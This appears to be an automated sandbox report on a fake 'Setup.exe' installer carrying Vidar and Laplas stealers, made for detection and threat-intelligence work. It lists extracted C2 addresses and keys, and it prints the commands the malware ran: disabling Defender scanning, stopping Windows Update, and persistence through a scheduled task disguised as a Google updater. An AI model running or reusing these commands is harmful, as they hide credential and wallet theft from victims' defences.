Analysis
-
max time kernel
107s -
max time network
159s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
-
submitted
06-04-2023 12:59
General
-
Target
Setup.exe
-
Size
1023.0MB
-
MD5
20435727abd593f6db2379c748289799
-
SHA1
12db6bce4173a977c0ad4de36a16f152dbcf5e49
-
SHA256
0f28b51ca82edd77e6d7f3626c8b66e6f04f6dfe48ff594f77ec6746a3c91968
-
SHA512
df5bc6ec08ac446b4add78cf9d657c2d7339d1cc69ca34f5c0b1881da05f6c8001791367299bdb1429f79aba626bdc110dfe50de6f1348155de5cc28f7752c78
-
SSDEEP
196608:4+hMmu0Vro/dFqg4cF3VjgY7lEGpDltGgC891SWAo0G:41m3OMEljl7lPftGgPuDr
Malware Config
Extracted
vidar
3.3
49bd1304650cc9c7f3f131428d9e16c2
https://steamcommunity.com/profiles/76561199492257783
https://t.me/justsometg
-
profile_id_v2
49bd1304650cc9c7f3f131428d9e16c2
-
user_agent
Mozilla/5.0 (X11; Linux 3.5.4-1-ARCH i686; es) KHTML/4.9.1 (like Gecko) Konqueror/4.9
Extracted
laplas
http://45.159.189.105
-
api_key
6a2714906f1325d666e4cf9f6269c2352ccfb7e7f1a23c114287dc69ddf27cb0
Signatures
-
Laplas Clipper
Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 6 IoCs
-
Loads dropped DLL 2 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Program Files directory 1 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 1 IoCs
-
Modifies data under HKEY_USERS 41 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQA1AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Setup.exeC:\Users\Admin\AppData\Local\Temp\Setup.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\Setup.exeC:\Users\Admin\AppData\Local\Temp\Setup.exe3⤵
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\60785919917096625484.exe"C:\ProgramData\60785919917096625484.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\ProgramData\60785919917096625484.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 06⤵
-
C:\ProgramData\72582125044977763627.exe"C:\ProgramData\72582125044977763627.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQA1AA==5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\72582125044977763627.exeC:\ProgramData\72582125044977763627.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQA1AA==7⤵
-
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exeC:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe7⤵
-
C:\ProgramData\97095732896179926616.exe"C:\ProgramData\97095732896179926616.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Setup.exe" & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#rxejhfcm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#rxejhfcm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
9.9MB
MD56fa2a8de3fc30b9c80d12c2ac4ad2e3f
SHA132fd7a00979b4ec01c031fdfbf12677529e6c4fa
SHA256a2c59381ca2fdba45f345eec78681fc417271e2f3fb65ff9ec06998d90abc9fd
SHA5129c51ac0abcab4b8e40b476dbb8e7aaff7a6057caf07756a1a846193bf9d4924fbe0f3f0847237029ecb6f840f658eb41fe43bb89dc7c74be6727c3ee12fe953e
-
C:\ProgramData\60785919917096625484.exeFilesize
13.9MB
MD50abca5a76379dc774f4c133a177cde59
SHA15c7c48d7f3fea2c5e5f950cf83492cda82fda838
SHA25659a16f9faf29768ed027a33dced3dc1cd61c4be814b59070b3ce79e34bb6b963
SHA512dd3176ce1e26992be85022a0a9825520496d20a3a7d09b44a4ddedc05511668411f16733efcb82f80f105fef94c2bfa59f9fe908ef281de65f585a1448b668c7
-
C:\ProgramData\60785919917096625484.exeFilesize
13.9MB
MD50abca5a76379dc774f4c133a177cde59
SHA15c7c48d7f3fea2c5e5f950cf83492cda82fda838
SHA25659a16f9faf29768ed027a33dced3dc1cd61c4be814b59070b3ce79e34bb6b963
SHA512dd3176ce1e26992be85022a0a9825520496d20a3a7d09b44a4ddedc05511668411f16733efcb82f80f105fef94c2bfa59f9fe908ef281de65f585a1448b668c7
-
C:\ProgramData\60785919917096625484.exeFilesize
13.9MB
MD50abca5a76379dc774f4c133a177cde59
SHA15c7c48d7f3fea2c5e5f950cf83492cda82fda838
SHA25659a16f9faf29768ed027a33dced3dc1cd61c4be814b59070b3ce79e34bb6b963
SHA512dd3176ce1e26992be85022a0a9825520496d20a3a7d09b44a4ddedc05511668411f16733efcb82f80f105fef94c2bfa59f9fe908ef281de65f585a1448b668c7
-
C:\ProgramData\72582125044977763627.exeFilesize
5.9MB
MD5aa57f0d7a099773175006624cc891b29
SHA144598d94dac6e9c72ffe65f9e17cf77c2c73e6fe
SHA2566227df9ce53429b024cb2fa118a7a735ec1c048117cb1a46247e92f1b839814f
SHA512e0fff8e7d8de1dc5b3d84bdea90828f9739499183aabb11eb5b7600af132f8fa0569bc49d4ca21ec5df925482ec2149d0134a88a4e8a632cb0326444a6bc31b0
-
C:\ProgramData\72582125044977763627.exeFilesize
5.9MB
MD5aa57f0d7a099773175006624cc891b29
SHA144598d94dac6e9c72ffe65f9e17cf77c2c73e6fe
SHA2566227df9ce53429b024cb2fa118a7a735ec1c048117cb1a46247e92f1b839814f
SHA512e0fff8e7d8de1dc5b3d84bdea90828f9739499183aabb11eb5b7600af132f8fa0569bc49d4ca21ec5df925482ec2149d0134a88a4e8a632cb0326444a6bc31b0
-
C:\ProgramData\72582125044977763627.exeFilesize
5.9MB
MD5aa57f0d7a099773175006624cc891b29
SHA144598d94dac6e9c72ffe65f9e17cf77c2c73e6fe
SHA2566227df9ce53429b024cb2fa118a7a735ec1c048117cb1a46247e92f1b839814f
SHA512e0fff8e7d8de1dc5b3d84bdea90828f9739499183aabb11eb5b7600af132f8fa0569bc49d4ca21ec5df925482ec2149d0134a88a4e8a632cb0326444a6bc31b0
-
C:\ProgramData\72582125044977763627.exeFilesize
5.9MB
MD5aa57f0d7a099773175006624cc891b29
SHA144598d94dac6e9c72ffe65f9e17cf77c2c73e6fe
SHA2566227df9ce53429b024cb2fa118a7a735ec1c048117cb1a46247e92f1b839814f
SHA512e0fff8e7d8de1dc5b3d84bdea90828f9739499183aabb11eb5b7600af132f8fa0569bc49d4ca21ec5df925482ec2149d0134a88a4e8a632cb0326444a6bc31b0
-
C:\ProgramData\97095732896179926616.exeFilesize
9.9MB
MD56fa2a8de3fc30b9c80d12c2ac4ad2e3f
SHA132fd7a00979b4ec01c031fdfbf12677529e6c4fa
SHA256a2c59381ca2fdba45f345eec78681fc417271e2f3fb65ff9ec06998d90abc9fd
SHA5129c51ac0abcab4b8e40b476dbb8e7aaff7a6057caf07756a1a846193bf9d4924fbe0f3f0847237029ecb6f840f658eb41fe43bb89dc7c74be6727c3ee12fe953e
-
C:\ProgramData\97095732896179926616.exeFilesize
9.9MB
MD56fa2a8de3fc30b9c80d12c2ac4ad2e3f
SHA132fd7a00979b4ec01c031fdfbf12677529e6c4fa
SHA256a2c59381ca2fdba45f345eec78681fc417271e2f3fb65ff9ec06998d90abc9fd
SHA5129c51ac0abcab4b8e40b476dbb8e7aaff7a6057caf07756a1a846193bf9d4924fbe0f3f0847237029ecb6f840f658eb41fe43bb89dc7c74be6727c3ee12fe953e
-
C:\ProgramData\97095732896179926616.exeFilesize
9.9MB
MD56fa2a8de3fc30b9c80d12c2ac4ad2e3f
SHA132fd7a00979b4ec01c031fdfbf12677529e6c4fa
SHA256a2c59381ca2fdba45f345eec78681fc417271e2f3fb65ff9ec06998d90abc9fd
SHA5129c51ac0abcab4b8e40b476dbb8e7aaff7a6057caf07756a1a846193bf9d4924fbe0f3f0847237029ecb6f840f658eb41fe43bb89dc7c74be6727c3ee12fe953e
-
C:\ProgramData\mozglue.dllFilesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
C:\ProgramData\nss3.dllFilesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5622bf737a997b9a257f15dc3b9ee9da5
SHA16beba023f9c081393b64de079969e948a47be8be
SHA256bcefb9a5dbc47579f8b52cc37fd7591a0e20f00f0a7867df0232088db90273d7
SHA512c1833c09ef0b3e643b8657874e8a99d7d154ac255c326d85fccba53aa57679e7dad93e61b3b8419937cb7ad936eab727c5edd6c4be6b988982c1d61505305e77
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD54280e36a29fa31c01e4d8b2ba726a0d8
SHA1c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheFilesize
53KB
MD506ad34f9739c5159b4d92d702545bd49
SHA19152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
16KB
MD5e43ce2e13c3fd34b68f5102cd50dd42b
SHA12aab7ee1d38d6c421ed3cb5b6320efe9793970c8
SHA256d62503f3a8e5662fa5d5d7d873146235b13d40a0842127cec5bf938a30be3e5a
SHA512feca119dc004be29af8e97285b6339738047289c6610826157fa1ed67d8c25d8723e787d5b78de3eb741368900a82560cdb29742ba49d12960ee73216cf658d8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
15KB
MD5df18d0e4177ecbfb5419a14fa7b36cee
SHA100f0f004c5fb6d8c84fe528fc833c6cb962b44fe
SHA256da8db5ffa16083afb1b6612b7fd78543e6e9f9c2c8bfff6bdc9986d4529cc112
SHA5128399e54ff88a604d492683e40a50490ad85db337deda39179f732710b2837982094c2780a89d0d5c59976bd00497ab0203b97289c81f0324a446518838a8121b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD59b80cd7a712469a4c45fec564313d9eb
SHA16125c01bc10d204ca36ad1110afe714678655f2d
SHA2565a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
SHA512ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD586798a85be626b523af4678231a63d32
SHA1867b5fe8f4fa328794b832d48aec2a769790669b
SHA2564584dd0e24edda81bd2893990332b4a2d567bba4889d0401ad48a6adf0bf6ef3
SHA51289e07875abc0b40c5305db7c7b9218b41afe8a4b734fbe7c929ee20855429ad8ddade4f6bb53b1f5fd188b46f83af7e1bd610dfc9d26fabd17c64239a204d775
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xkztmmyk.yvz.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exeFilesize
522.4MB
MD56b24fc8db4462997bc5e3880e0edf0ba
SHA129dd23bee6de2936acf6a58081fdafba9be91ba1
SHA256ca1ba8709d2d3f33858ef617e07fc0e298a54b251efa8ea408cfd76db0044718
SHA5129d9f8fbf4c9846e277eadfb34fa0e06ac9e7860e98e229662147da483313dcf1ef1a588c76c680b306eb0af3abd56f9b1b92f2c328bf0a6080720d47db107b09
-
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exeFilesize
521.2MB
MD511f73ade8d066d0ae81a80cbda4c514a
SHA1d58d386bffe739cf3a3411f496ea79eb556832af
SHA2567b8d5b2af50dc4663756fac1d4eea1b937b85f5f040837cba3802d8589a84e52
SHA51266a45eebfe21b443699d600cbeb5229b4a4a4a52d1f122efbf3382a6b419c90396a870beeec9e8b27fc6e8100909f4c4af39a254768fdd9d2c22e22e77862bf5
-
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exeFilesize
57.6MB
MD503e9aed5513ca3f7c0a2ed3b50126ebd
SHA1c42760ea9ff3c2ae79ab296d7dbebe87cb4eb68f
SHA256920e9e3bce99a20a40a63d0af9c70b859cfcf19fccab56208b82f5e248153a3f
SHA512187ffafb86d7c18724f8aaf4b056259fa4984d78cc82106c557d12263e561b04f5af3056da153d50252b3cff18268383ae97046ee682290b801ad5ee7a3b9dbe
-
C:\Windows\System32\drivers\etc\hostsFilesize
3KB
MD500930b40cba79465b7a38ed0449d1449
SHA14b25a89ee28b20ba162f23772ddaf017669092a5
SHA256eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5
-
memory/216-453-0x0000000000400000-0x0000000000484000-memory.dmpFilesize
528KB
-
memory/216-448-0x0000000000400000-0x0000000000484000-memory.dmpFilesize
528KB
-
memory/216-446-0x0000000000400000-0x0000000000484000-memory.dmpFilesize
528KB
-
memory/864-311-0x0000000005440000-0x0000000005450000-memory.dmpFilesize
64KB
-
memory/864-286-0x0000000005440000-0x0000000005450000-memory.dmpFilesize
64KB
-
memory/864-285-0x00000000009A0000-0x0000000000BE8000-memory.dmpFilesize
2.3MB
-
memory/1356-171-0x0000000000910000-0x0000000001418000-memory.dmpFilesize
11.0MB
-
memory/1688-433-0x00000000050C0000-0x00000000050D0000-memory.dmpFilesize
64KB
-
memory/1688-392-0x00000000050C0000-0x00000000050D0000-memory.dmpFilesize
64KB
-
memory/2256-417-0x000002511AA70000-0x000002511AA8C000-memory.dmpFilesize
112KB
-
memory/2256-406-0x00000251000C0000-0x00000251000D0000-memory.dmpFilesize
64KB
-
memory/2256-438-0x00000251000C0000-0x00000251000D0000-memory.dmpFilesize
64KB
-
memory/2256-439-0x00000251000C0000-0x00000251000D0000-memory.dmpFilesize
64KB
-
memory/2256-427-0x000002517F520000-0x000002517F52A000-memory.dmpFilesize
40KB
-
memory/2256-434-0x000002517F950000-0x000002517F96A000-memory.dmpFilesize
104KB
-
memory/2256-430-0x00007FF4154E0000-0x00007FF4154F0000-memory.dmpFilesize
64KB
-
memory/2256-435-0x000002511AC90000-0x000002511AC96000-memory.dmpFilesize
24KB
-
memory/2256-405-0x00000251000C0000-0x00000251000D0000-memory.dmpFilesize
64KB
-
memory/2256-404-0x00000251000C0000-0x00000251000D0000-memory.dmpFilesize
64KB
-
memory/2924-382-0x000002BBEE690000-0x000002BBEE6A0000-memory.dmpFilesize
64KB
-
memory/2924-383-0x00007FF46CF20000-0x00007FF46CF30000-memory.dmpFilesize
64KB
-
memory/2924-381-0x000002BBEE690000-0x000002BBEE6A0000-memory.dmpFilesize
64KB
-
memory/2924-380-0x000002BBEE690000-0x000002BBEE6A0000-memory.dmpFilesize
64KB
-
memory/3368-312-0x0000000002F00000-0x0000000002F10000-memory.dmpFilesize
64KB
-
memory/3368-297-0x0000000002F00000-0x0000000002F10000-memory.dmpFilesize
64KB
-
memory/3368-313-0x0000000002F00000-0x0000000002F10000-memory.dmpFilesize
64KB
-
memory/3368-298-0x0000000002F00000-0x0000000002F10000-memory.dmpFilesize
64KB
-
memory/3372-135-0x0000000000910000-0x0000000001418000-memory.dmpFilesize
11.0MB
-
memory/3372-133-0x0000000000910000-0x0000000001418000-memory.dmpFilesize
11.0MB
-
memory/3372-160-0x0000000005600000-0x0000000005610000-memory.dmpFilesize
64KB
-
memory/3372-174-0x0000000000910000-0x0000000001418000-memory.dmpFilesize
11.0MB
-
memory/3372-159-0x0000000000910000-0x0000000001418000-memory.dmpFilesize
11.0MB
-
memory/3372-138-0x0000000005600000-0x0000000005610000-memory.dmpFilesize
64KB
-
memory/3372-137-0x0000000005AC0000-0x0000000005AE2000-memory.dmpFilesize
136KB
-
memory/3372-136-0x0000000000910000-0x0000000001418000-memory.dmpFilesize
11.0MB
-
memory/3404-273-0x00000000004E0000-0x0000000001330000-memory.dmpFilesize
14.3MB
-
memory/3560-157-0x0000000007800000-0x0000000007E7A000-memory.dmpFilesize
6.5MB
-
memory/3560-145-0x00000000051F0000-0x0000000005256000-memory.dmpFilesize
408KB
-
memory/3560-162-0x0000000004C70000-0x0000000004C80000-memory.dmpFilesize
64KB
-
memory/3560-140-0x0000000002990000-0x00000000029C6000-memory.dmpFilesize
216KB
-
memory/3560-141-0x0000000004C70000-0x0000000004C80000-memory.dmpFilesize
64KB
-
memory/3560-142-0x0000000004C70000-0x0000000004C80000-memory.dmpFilesize
64KB
-
memory/3560-163-0x0000000004C70000-0x0000000004C80000-memory.dmpFilesize
64KB
-
memory/3560-143-0x00000000052B0000-0x00000000058D8000-memory.dmpFilesize
6.2MB
-
memory/3560-144-0x0000000005050000-0x00000000050B6000-memory.dmpFilesize
408KB
-
memory/3560-158-0x0000000006490000-0x00000000064AA000-memory.dmpFilesize
104KB
-
memory/3560-155-0x0000000005F80000-0x0000000005F9E000-memory.dmpFilesize
120KB
-
memory/3560-156-0x0000000004C70000-0x0000000004C80000-memory.dmpFilesize
64KB
-
memory/3560-164-0x0000000004C70000-0x0000000004C80000-memory.dmpFilesize
64KB
-
memory/3596-391-0x0000000000400000-0x0000000000484000-memory.dmpFilesize
528KB
-
memory/3596-319-0x0000000000400000-0x0000000000484000-memory.dmpFilesize
528KB
-
memory/3596-316-0x0000000000400000-0x0000000000484000-memory.dmpFilesize
528KB
-
memory/3596-321-0x0000000000400000-0x0000000000484000-memory.dmpFilesize
528KB
-
memory/3596-320-0x0000000000400000-0x0000000000484000-memory.dmpFilesize
528KB
-
memory/3652-442-0x00007FF7B4D00000-0x00007FF7B56E5000-memory.dmpFilesize
9.9MB
-
